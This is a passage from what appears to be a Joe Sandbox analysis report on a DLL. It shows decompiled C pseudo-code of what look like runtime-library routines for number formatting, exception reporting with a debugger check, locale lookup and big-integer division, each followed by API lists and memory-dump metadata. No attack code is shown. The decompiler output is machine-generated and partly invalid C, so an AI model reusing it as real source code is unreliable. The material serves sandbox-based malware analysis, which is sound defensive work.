              									_t149 = 0;
              									__eflags = 0;
              									_t98 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)) + 0x88))))));
              								} else {
              									_t98 = _t149;
              								}
              								 *_t174 = _t98;
              								_t100 = _t140[1] & 0x000fffff;
              								__eflags = _t100;
              								_v40 = _t100;
              								if(_t100 > 0) {
              									L26:
              									_t175 = _t149;
              									_t150 = 0xf0000;
              									_t101 = 0x30;
              									_v12 = _t101;
              									_v24 = _t149;
              									_v28 = 0xf0000;
              									while(1) {
              										_v32 = _v12 & 0x0000ffff;
              										_t104 = _t184;
              										_v36 = _t184;
              										_v40 = _t186;
              										__eflags = _t186;
              										if(__eflags <= 0) {
              											break;
              										}
              										_t127 = E6DAA1EF0( *_t140 & _t175, _v32 & 0x0000ffff, _t140[1] & _t150 & 0x000fffff);
              										_t161 = 0x30;
              										_t129 = _t127 + _t161 & 0x0000ffff;
              										__eflags = _t129 - 0x39;
              										if(_t129 > 0x39) {
              											_t129 = _t129 + _v48;
              											__eflags = _t129;
              										}
              										_t162 = _v28;
              										_t175 = (_t162 << 0x00000020 | _v24) >> 4;
              										 *_t184 = _t129;
              										_t184 = _t184 + 1;
              										_t150 = _t162 >> 4;
              										_t131 = _v12 - 4;
              										_t186 = _t186 - 1;
              										_v24 = (_t162 << 0x00000020 | _v24) >> 4;
              										_v28 = _t162 >> 4;
              										_v12 = _t131;
              										__eflags = _t131;
              										if(_t131 >= 0) {
              											continue;
              										} else {
              											goto L43;
              										}
              									}
              									_t186 = _v40;
              									_t184 = _t104;
              									_t105 = E6DA9512D(__eflags, _t140, _t175, _t150, _v32, _a36);
              									_t190 = _t190 + 0x14;
              									__eflags = _t105;
              									if(_t105 == 0) {
              										goto L43;
              									}
              									_t184 = _v36;
              									_t146 = 0x30;
              									_t124 = _t184 - 1;
              									while(1) {
              										_t156 =  *_t124;
              										__eflags = _t156 - 0x66;
              										if(_t156 == 0x66) {
              											goto L36;
              										}
              										__eflags = _t156 - 0x46;
              										if(_t156 != 0x46) {
              											_t140 = _a4;
              											__eflags = _t124 - _v16;
              											if(_t124 == _v16) {
              												_t65 = _t124 - 1;
              												 *_t65 =  *(_t124 - 1) + 1;
              												__eflags =  *_t65;
              											} else {
              												__eflags = _t156 - 0x39;
              												if(_t156 != 0x39) {
              													_t157 = _t156 + 1;
              													__eflags = _t157;
              												} else {
              													_t157 = _v48 + 0x3a;
              												}
              												 *_t124 = _t157;
              											}
              											goto L43;
              										}
              										L36:
              										 *_t124 = _t146;
              										_t124 = _t124 - 1;
              									}
              								} else {
              									__eflags =  *_t140 - _t149;
              									if( *_t140 <= _t149) {
              										L43:
              										__eflags = _t186;
              										if(_t186 > 0) {
              											_push(_t186);
              											_t122 = 0x30;
              											_push(_t122);
              											_push(_t184);
              											E6DA8B0A0(_t184);
              											_t184 = _t184 + _t186;
              											__eflags = _t184;
              										}
              										_t106 = _v16;
              										__eflags =  *_t106;
              										if( *_t106 == 0) {
              											_t184 = _t106;
              										}
              										 *_t184 = (_v5 << 5) + 0x50;
              										_t176 = _t140[1];
              										_t111 = E6DAA1EF0( *_t140, 0x34, _t176);
              										_t141 = 0;
              										_t188 = _t176 & 0;
              										_t70 = _t184 + 2; // 0x2
              										_t177 = _t70;
              										_t154 = (_t111 & 0x000007ff) - _v20;
              										__eflags = _t154;
              										_v48 = _t177;
              										asm("sbb esi, ebx");
              										if(__eflags < 0) {
              											L51:
              											_t154 =  ~_t154;
              											asm("adc esi, ebx");
              											_t188 =  ~_t188;
              											0x2b = 0x2d;
              											goto L52;
              										} else {
              											if(__eflags > 0) {
              												L50:
              												L52:
              												 *(_t184 + 1) = 0x2b;
              												_t185 = _t177;
              												_t113 = 0x30;
              												 *_t177 = _t113;
              												__eflags = _t188 - _t141;
              												if(__eflags < 0) {
              													L61:
              													_t178 = 0x30;
              													L62:
              													__eflags = _t188 - _t141;
              													if(__eflags < 0) {
              														L66:
              														_t155 = _t154 + _t178;
              														__eflags = _t155;
              														 *_t185 = _t155;
              														 *(_t185 + 1) = _t141;
              														L67:
              														_t114 = 0;
              														__eflags = 0;
              														L68:
              														return _t114;
              													}
              													if(__eflags > 0) {
              														L65:
              														_push(_t141);
              														_push(_t141);
              														_push(0xa);
              														_push(_t188);
              														_push(_t154);
              														_t115 = E6DAA1F10();
              														_v48 = _t178;
              														_t178 = 0x30;
              														 *_t185 = _t115 + _t178;
              														_t185 = _t185 + 1;
              														_t141 = 0;
              														__eflags = 0;
              														goto L66;
              													}
              													__eflags = _t154 - 0xa;
              													if(_t154 < 0xa) {
              														goto L66;
              													}
              													goto L65;
              												}
              												if(__eflags > 0) {
              													L55:
              													_push(_t141);
              													_push(_t141);
              													_push(0x3e8);
              													_push(_t188);
              													_push(_t154);
              													_t118 = E6DAA1F10();
              													_t188 = _t141;
              													_v40 = _t177;
              													_t177 = _v48;
              													_t141 = 0;
              													_t185 = _t177 + 1;
              													 *_t177 = _t118 + 0x30;
              													__eflags = _t185 - _t177;
              													if(_t185 != _t177) {
              														L59:
              														_push(_t141);
              														_push(_t141);
              														_push(0x64);
              														_push(_t188);
              														_push(_t154);
              														_t120 = E6DAA1F10();
              														_t188 = _t141;
              														_v40 = _t177;
              														_t141 = 0;
              														_t178 = 0x30;
              														 *_t185 = _t120 + _t178;
              														_t185 = _t185 + 1;
              														__eflags = _t185 - _v48;
              														if(_t185 != _v48) {
              															goto L65;
              														}
              														goto L62;
              													}
              													L56:
              													__eflags = _t188 - _t141;
              													if(__eflags < 0) {
              														goto L61;
              													}
              													if(__eflags > 0) {
              														goto L59;
              													}
              													__eflags = _t154 - 0x64;
              													if(_t154 < 0x64) {
              														goto L61;
              													}
              													goto L59;
              												}
              												__eflags = _t154 - 0x3e8;
              												if(_t154 < 0x3e8) {
              													goto L56;
              												}
              												goto L55;
              											}
              											__eflags = _t154;
              											if(_t154 < 0) {
              												goto L51;
              											}
              											goto L50;
              										}
              									}
              									goto L26;
              								}
              							}
              							 *_t183 = _t93;
              							_t149 =  *_t140 | _t140[1] & 0x000fffff;
              							__eflags = _t149;
              							if(_t149 != 0) {
              								_v20 = 0x3fe;
              								goto L18;
              							}
              							_v20 = _t149;
              							goto L19;
              						}
              						if(__eflags < 0) {
              							L12:
              							 *_t183 = 0x2d;
              							_t183 = _t183 + 1;
              							__eflags = _t183;
              							_t147 = _t140[1];
              							goto L13;
              						}
              						__eflags = _t173;
              						if(_t173 >= 0) {
              							goto L13;
              						}
              						goto L12;
              					}
              					_t114 = E6DA94C28(_t140, _t147, _t173, __eflags, _t140, _t183, _a12, _a16, _a20, _t186, 0, _a32, _a36, _a40);
              					__eflags = _t114;
              					if(_t114 == 0) {
              						_t136 = E6DAA2080(_t183, 0x65);
              						__eflags = _t136;
              						if(_t136 != 0) {
              							 *_t136 = ((_a28 ^ 0x00000001) << 5) + 0x50;
              							 *((char*)(_t136 + 3)) = 0;
              						}
              						goto L67;
              					}
              					 *_t183 = 0;
              					goto L68;
              				}
              				_t171 = _a40;
              				_t189 = 0x22;
              				 *((char*)(_t171 + 0x1c)) = 1;
              				 *((intOrPtr*)(_t171 + 0x18)) = _t189;
              				E6DA8DA42(_t183, _t189, 0, 0, 0, 0, 0, _t171);
              				return _t189;
              			}


              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 85%
              			E6DA89EC6(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
              				char _v0;
              				struct _EXCEPTION_POINTERS _v12;
              				intOrPtr _v80;
              				intOrPtr _v88;
              				char _v92;
              				intOrPtr _v608;
              				intOrPtr _v612;
              				void* _v616;
              				intOrPtr _v620;
              				char _v624;
              				intOrPtr _v628;
              				intOrPtr _v632;
              				intOrPtr _v636;
              				intOrPtr _v640;
              				intOrPtr _v644;
              				intOrPtr _v648;
              				intOrPtr _v652;
              				intOrPtr _v656;
              				intOrPtr _v660;
              				intOrPtr _v664;
              				intOrPtr _v668;
              				char _v808;
              				char* _t39;
              				long _t49;
              				intOrPtr _t51;
              				void* _t54;
              				intOrPtr _t55;
              				intOrPtr _t57;
              				intOrPtr _t58;
              				intOrPtr _t59;
              				intOrPtr* _t60;
              
              				_t59 = __esi;
              				_t58 = __edi;
              				_t57 = __edx;
              				if(IsProcessorFeaturePresent(0x17) != 0) {
              					_t55 = _a4;
              					asm("int 0x29");
              				}
              				E6DA89FE1(_t34);
              				 *_t60 = 0x2cc;
              				_v632 = E6DA8B0A0(_t58,  &_v808, 0, 3);
              				_v636 = _t55;
              				_v640 = _t57;
              				_v644 = _t51;
              				_v648 = _t59;
              				_v652 = _t58;
              				_v608 = ss;
              				_v620 = cs;
              				_v656 = ds;
              				_v660 = es;
              				_v664 = fs;
              				_v668 = gs;
              				asm("pushfd");
              				_pop( *_t15);
              				_v624 = _v0;
              				_t39 =  &_v0;
              				_v612 = _t39;
              				_v808 = 0x10001;
              				_v628 =  *((intOrPtr*)(_t39 - 4));
              				E6DA8B0A0(_t58,  &_v92, 0, 0x50);
              				_v92 = 0x40000015;
              				_v88 = 1;
              				_v80 = _v0;
              				_t28 = IsDebuggerPresent() - 1; // -1
              				_v12.ExceptionRecord =  &_v92;
              				asm("sbb bl, bl");
              				_v12.ContextRecord =  &_v808;
              				_t54 =  ~_t28 + 1;
              				SetUnhandledExceptionFilter(0);
              				_t49 = UnhandledExceptionFilter( &_v12);
              				if(_t49 == 0 && _t54 == 0) {
              					_push(3);
              					return E6DA89FE1(_t49);
              				}
              				return _t49;
              			}


              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6DA89ED2
              • IsDebuggerPresent.KERNEL32 ref: 6DA89F9E
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6DA89FBE
              • UnhandledExceptionFilter.KERNEL32(?), ref: 6DA89FC8
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
              • String ID:
              • API String ID: 254469556-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E6DA9C3C1(void* __ecx, signed char __edx, intOrPtr _a4) {
              				signed int _v8;
              				short _v248;
              				signed int _v252;
              				intOrPtr _v256;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				signed int _t50;
              				int _t56;
              				signed int _t58;
              				void* _t74;
              				intOrPtr _t80;
              				void* _t89;
              				void* _t92;
              				intOrPtr _t93;
              				void* _t94;
              				signed int _t111;
              				signed int _t115;
              				intOrPtr* _t117;
              				intOrPtr* _t122;
              				signed int* _t124;
              				int _t126;
              				signed int _t127;
              				void* _t128;
              				void* _t140;
              
              				_t121 = __edx;
              				_t50 =  *0x6dab3014; // 0x6c4e8ceb
              				_v8 = _t50 ^ _t127;
              				_t125 = _a4;
              				_t94 = E6DA92BDC(__ecx, __edx, _a4);
              				_t124 =  *(E6DA92BDC(__ecx, __edx, _a4) + 0x34c);
              				_t126 = E6DA9C6E9(_t125);
              				asm("sbb ecx, ecx");
              				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
              				_v252 = _v252 & 0x00000000;
              				if(_t56 == 0) {
              					L37:
              					 *_t124 = 0;
              					_t58 = 1;
              					L38:
              					return E6DA89B91(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
              				}
              				if(E6DA990B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
              					L16:
              					if(( *_t124 & 0x00000300) == 0x300) {
              						L36:
              						_t58 =  !( *_t124 >> 2) & 0x00000001;
              						goto L38;
              					}
              					asm("sbb eax, eax");
              					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
              						goto L37;
              					}
              					_t74 = E6DA990B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
              					if(_t74 != 0) {
              						if( *(_t94 + 0x60) == 0 &&  *((intOrPtr*)(_t94 + 0x5c)) != 0 && E6DA990B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248) == 0) {
              							_push(_t124);
              							_t94 = 0;
              							if(E6DA9C843(_t126, 0) == 0) {
              								goto L36;
              							}
              							 *_t124 =  *_t124 | 0x00000100;
              							L34:
              							if(_t140 == 0) {
              								_t124[1] = _t126;
              							}
              						}
              						goto L36;
              					}
              					_t111 =  *_t124 | 0x00000200;
              					 *_t124 = _t111;
              					if( *(_t94 + 0x60) == _t74) {
              						if( *((intOrPtr*)(_t94 + 0x5c)) == _t74) {
              							goto L20;
              						}
              						_t122 =  *((intOrPtr*)(_t94 + 0x50));
              						_v256 = _t122 + 2;
              						do {
              							_t80 =  *_t122;
              							_t122 = _t122 + 2;
              						} while (_t80 != _v252);
              						_t121 = _t122 - _v256 >> 1;
              						if(_t122 - _v256 >> 1 !=  *((intOrPtr*)(_t94 + 0x5c))) {
              							_t74 = 0;
              							goto L20;
              						}
              						_push(_t124);
              						if(E6DA9C843(_t126, 1) == 0) {
              							goto L36;
              						}
              						 *_t124 =  *_t124 | 0x00000100;
              						_t74 = 0;
              						L21:
              						_t140 = _t124[1] - _t74;
              						goto L34;
              					}
              					L20:
              					 *_t124 = _t111 | 0x00000100;
              					goto L21;
              				}
              				asm("sbb eax, eax");
              				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
              					goto L37;
              				}
              				_t89 = E6DA990B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
              				_t115 =  *_t124;
              				if(_t89 != 0) {
              					if((_t115 & 0x00000002) != 0) {
              						goto L16;
              					}
              					if( *((intOrPtr*)(_t94 + 0x5c)) == 0) {
              						L12:
              						_t121 =  *_t124;
              						if((_t121 & 0x00000001) != 0 || E6DA9C81E(_t126) == 0) {
              							goto L16;
              						} else {
              							 *_t124 = _t121;
              							goto L15;
              						}
              					}
              					_t92 = E6DAA07D4(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *((intOrPtr*)(_t94 + 0x5c)));
              					_t128 = _t128 + 0xc;
              					if(_t92 != 0) {
              						goto L12;
              					}
              					 *_t124 =  *_t124 | 0x00000002;
              					_t124[2] = _t126;
              					_t117 =  *((intOrPtr*)(_t94 + 0x50));
              					_t121 = _t117 + 2;
              					do {
              						_t93 =  *_t117;
              						_t117 = _t117 + 2;
              					} while (_t93 != _v252);
              					if(_t117 - _t121 >> 1 ==  *((intOrPtr*)(_t94 + 0x5c))) {
              						_t124[1] = _t126;
              					}
              				} else {
              					_t124[1] = _t126;
              					 *_t124 = _t115 | 0x00000304;
              					L15:
              					_t124[2] = _t126;
              				}
              			}


              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA9C415
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA9C45F
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA9C525
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: InfoLocale$ErrorLast
              • String ID:
              • API String ID: 661929714-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E6DA8D8C3(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
              				char _v0;
              				signed int _v8;
              				intOrPtr _v524;
              				intOrPtr _v528;
              				void* _v532;
              				intOrPtr _v536;
              				char _v540;
              				intOrPtr _v544;
              				intOrPtr _v548;
              				intOrPtr _v552;
              				intOrPtr _v556;
              				intOrPtr _v560;
              				intOrPtr _v564;
              				intOrPtr _v568;
              				intOrPtr _v572;
              				intOrPtr _v576;
              				intOrPtr _v580;
              				intOrPtr _v584;
              				char _v724;
              				intOrPtr _v792;
              				intOrPtr _v800;
              				char _v804;
              				struct _EXCEPTION_POINTERS _v812;
              				void* __edi;
              				signed int _t40;
              				char* _t47;
              				char* _t49;
              				intOrPtr _t60;
              				intOrPtr _t61;
              				intOrPtr _t65;
              				intOrPtr _t66;
              				int _t67;
              				intOrPtr _t68;
              				signed int _t69;
              
              				_t68 = __esi;
              				_t65 = __edx;
              				_t60 = __ebx;
              				_t40 =  *0x6dab3014; // 0x6c4e8ceb
              				_t41 = _t40 ^ _t69;
              				_v8 = _t40 ^ _t69;
              				if(_a4 != 0xffffffff) {
              					_push(_a4);
              					E6DA89FE1(_t41);
              					_pop(_t61);
              				}
              				E6DA8B0A0(_t66,  &_v804, 0, 0x50);
              				E6DA8B0A0(_t66,  &_v724, 0, 0x2cc);
              				_v812.ExceptionRecord =  &_v804;
              				_t47 =  &_v724;
              				_v812.ContextRecord = _t47;
              				_v548 = _t47;
              				_v552 = _t61;
              				_v556 = _t65;
              				_v560 = _t60;
              				_v564 = _t68;
              				_v568 = _t66;
              				_v524 = ss;
              				_v536 = cs;
              				_v572 = ds;
              				_v576 = es;
              				_v580 = fs;
              				_v584 = gs;
              				asm("pushfd");
              				_pop( *_t22);
              				_v540 = _v0;
              				_t49 =  &_v0;
              				_v528 = _t49;
              				_v724 = 0x10001;
              				_v544 =  *((intOrPtr*)(_t49 - 4));
              				_v804 = _a8;
              				_v800 = _a12;
              				_v792 = _v0;
              				_t67 = IsDebuggerPresent();
              				SetUnhandledExceptionFilter(0);
              				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
              					_push(_a4);
              					_t57 = E6DA89FE1(_t57);
              				}
              				return E6DA89B91(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
              			}

              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6DA8D9BB
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6DA8D9C5
              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6DA8D9D2
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: 81b866c4252fe133986b118eb72ea4acf85d8e6bd9e2d1cfcfbee8024d7d0eeb
              • Instruction ID: b6fb15600e5affc150ebbb5bea3fbe8344498087a134a75e94681cb1e01d82eb
              • Opcode Fuzzy Hash: 81b866c4252fe133986b118eb72ea4acf85d8e6bd9e2d1cfcfbee8024d7d0eeb
              • Instruction Fuzzy Hash: 7D31E57490522D9BCF21DF28D98878CBBB8BF08310F5042EAE91CA7251EB709BC18F45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 94%
              			E6DA904A0(signed int* _a4, intOrPtr* _a8) {
              				signed int _v8;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				signed int _v28;
              				signed int _v32;
              				signed int _v36;
              				signed int _v40;
              				signed int _v44;
              				signed int _v48;
              				intOrPtr* _v52;
              				signed int _v56;
              				signed int _v64;
              				signed int _v68;
              				signed int _v72;
              				signed int _v76;
              				signed int _v80;
              				char _v540;
              				signed int _v544;
              				signed int* _t179;
              				signed int _t181;
              				intOrPtr _t182;
              				signed int _t185;
              				signed int* _t187;
              				signed int _t189;
              				unsigned int _t190;
              				signed int _t191;
              				signed int _t192;
              				signed int _t201;
              				intOrPtr _t207;
              				void* _t210;
              				signed int _t212;
              				signed int _t223;
              				void* _t227;
              				signed int _t230;
              				intOrPtr* _t237;
              				signed int _t238;
              				signed int* _t239;
              				signed int _t241;
              				signed int _t243;
              				signed int _t244;
              				void* _t245;
              				intOrPtr* _t246;
              				signed int _t247;
              				signed int _t252;
              				unsigned int _t253;
              				signed int _t255;
              				signed int _t256;
              				signed int _t257;
              				signed int _t258;
              				signed int _t259;
              				intOrPtr _t260;
              				void* _t264;
              				signed char _t270;
              				intOrPtr* _t272;
              				signed int _t276;
              				signed int* _t277;
              				signed int _t284;
              				signed int _t285;
              				signed int* _t288;
              				signed int _t291;
              				signed int _t293;
              				intOrPtr* _t294;
              				signed int _t298;
              				signed int _t299;
              				intOrPtr* _t300;
              				signed int _t305;
              				signed int _t310;
              				signed int _t311;
              				signed int _t312;
              				signed int _t314;
              				void* _t315;
              				signed int _t316;
              				signed int* _t323;
              				signed int* _t325;
              				signed int _t329;
              				signed int _t331;
              				signed int _t332;
              				signed int _t334;
              				void* _t335;
              				signed int _t340;
              				signed int _t345;
              				intOrPtr* _t347;
              				signed int* _t348;
              
              				_t179 = _a4;
              				_t329 =  *_t179;
              				if(_t329 == 0) {
              					L76:
              					__eflags = 0;
              					return 0;
              				} else {
              					_t237 = _a8;
              					_t310 =  *_t237;
              					_v72 = _t310;
              					if(_t310 == 0) {
              						goto L76;
              					} else {
              						_t4 = _t329 - 1; // 0x1cb
              						_t252 = _t4;
              						_v8 = _t252;
              						_t311 = _t310 + 0xffffffff;
              						if(_t311 != 0) {
              							__eflags = _t311 - _t252;
              							if(_t311 > _t252) {
              								goto L76;
              							} else {
              								_t181 = _t252;
              								_t284 = _t252 - _t311;
              								__eflags = _t252 - _t284;
              								if(_t252 < _t284) {
              									L19:
              									_t284 = _t284 + 1;
              									__eflags = _t284;
              								} else {
              									_t345 =  &(_a4[1]);
              									__eflags = _t345;
              									_t272 = _t345 + _t252 * 4;
              									_t46 = _t237 + 4; // 0x6da9df36
              									_t347 = _t46 + _t311 * 4;
              									while(1) {
              										__eflags =  *_t347 -  *_t272;
              										if(__eflags != 0) {
              											break;
              										}
              										_t181 = _t181 - 1;
              										_t347 = _t347 - 4;
              										_t272 = _t272 - 4;
              										__eflags = _t181 - _t284;
              										if(_t181 >= _t284) {
              											continue;
              										} else {
              											goto L19;
              										}
              										goto L20;
              									}
              									if(__eflags < 0) {
              										goto L19;
              									}
              								}
              								L20:
              								__eflags = _t284;
              								if(__eflags == 0) {
              									goto L76;
              								} else {
              									_t182 = _a8;
              									_t238 = _v72;
              									_t331 =  *(_t182 + _t238 * 4);
              									_t54 = _t238 * 4; // 0xffff256e
              									_t253 =  *(_t182 + _t54 - 4);
              									asm("bsr eax, esi");
              									_v44 = _t331;
              									_v36 = _t253;
              									if(__eflags == 0) {
              										_t312 = 0x20;
              									} else {
              										_t312 = 0x1f - _t182;
              									}
              									_v12 = _t312;
              									_v40 = 0x20 - _t312;
              									__eflags = _t312;
              									if(_t312 != 0) {
              										_t270 = _t312;
              										_v36 = _v36 << _t270;
              										_v44 = _t331 << _t270 | _t253 >> _v40;
              										__eflags = _t238 - 2;
              										if(_t238 > 2) {
              											_t67 = _t238 * 4; // 0xe850ffff
              											_t69 =  &_v36;
              											 *_t69 = _v36 |  *(_a8 + _t67 - 8) >> _v40;
              											__eflags =  *_t69;
              										}
              									}
              									_t332 = 0;
              									_v32 = 0;
              									_t285 = _t284 + 0xffffffff;
              									__eflags = _t285;
              									_v80 = _t285;
              									if(_t285 >= 0) {
              										_t187 = _a4;
              										_t256 = _t285 + _t238;
              										_v48 = _t256;
              										_v52 = _t187 + (_t285 + 1) * 4;
              										_t189 = _t187 + _t256 * 4 + 0xfffffffc;
              										__eflags = _t189;
              										_v28 = _t189;
              										do {
              											__eflags = _t256 - _v8;
              											if(_t256 > _v8) {
              												_t257 = 0;
              												__eflags = 0;
              											} else {
              												_t257 =  *(_t189 + 8);
              											}
              											_t291 =  *(_t189 + 4);
              											_t241 = _t257;
              											_t190 =  *_t189;
              											_v76 = _t257;
              											_v56 = 0;
              											_v20 = _t190;
              											__eflags = _t312;
              											if(_t312 != 0) {
              												_t298 = _t241;
              												_t212 = E6DAA1ED0(_t291, _v12, _t298);
              												_t257 = _v12;
              												_t241 = _t298;
              												_t291 = _t190 >> _v40 | _t212;
              												_t332 = _v20 << _t257;
              												__eflags = _v48 - 3;
              												_v20 = _t332;
              												if(_v48 >= 3) {
              													_t257 = _v40;
              													_t332 = _t332 |  *(_v28 - 4) >> _t257;
              													__eflags = _t332;
              													_v20 = _t332;
              												}
              											}
              											_push(_t241);
              											_t191 = E6DAA1E30(_t291, _t241, _v44, 0);
              											_v56 = _t241;
              											_t243 = _t191;
              											_t334 = _t332 ^ _t332;
              											_t192 = _t291;
              											_v24 = _t243;
              											_v16 = _t192;
              											_t314 = _t257;
              											_v68 = _t243;
              											_v64 = _t192;
              											_v56 = _t334;
              											__eflags = _t192;
              											if(_t192 != 0) {
              												L37:
              												_t244 = _t243 + 1;
              												asm("adc eax, 0xffffffff");
              												_t314 = _t314 + E6DA89C50(_t244, _t192, _v44, 0);
              												asm("adc esi, edx");
              												_t243 = _t244 | 0xffffffff;
              												_t192 = 0;
              												__eflags = 0;
              												_v56 = _t334;
              												_v24 = _t243;
              												_v68 = _t243;
              												_v16 = 0;
              												_v64 = 0;
              											} else {
              												__eflags = _t243 - 0xffffffff;
              												if(_t243 > 0xffffffff) {
              													goto L37;
              												}
              											}
              											__eflags = _t334;
              											if(__eflags <= 0) {
              												if(__eflags < 0) {
              													goto L42;
              												} else {
              													__eflags = _t314 - 0xffffffff;
              													if(_t314 <= 0xffffffff) {
              														while(1) {
              															L42:
              															_v24 = _v20;
              															_t210 = E6DA89C50(_v36, 0, _t243, _t192);
              															__eflags = _t291 - _t314;
              															if(__eflags < 0) {
              																break;
              															}
              															if(__eflags > 0) {
              																L45:
              																_t192 = _v16;
              																_t243 = _t243 + 0xffffffff;
              																_v68 = _t243;
              																asm("adc eax, 0xffffffff");
              																_t314 = _t314 + _v44;
              																__eflags = _t314;
              																_v16 = _t192;
              																asm("adc dword [ebp-0x34], 0x0");
              																_v64 = _t192;
              																if(_t314 == 0) {
              																	__eflags = _t314 - 0xffffffff;
              																	if(_t314 <= 0xffffffff) {
              																		continue;
              																	} else {
              																	}
              																}
              															} else {
              																__eflags = _t210 - _v24;
              																if(_t210 <= _v24) {
              																	break;
              																} else {
              																	goto L45;
              																}
              															}
              															L49:
              															_v24 = _t243;
              															goto L50;
              														}
              														_t192 = _v16;
              														goto L49;
              													}
              												}
              											}
              											L50:
              											__eflags = _t192;
              											if(_t192 != 0) {
              												L52:
              												_t258 = _v72;
              												_t315 = 0;
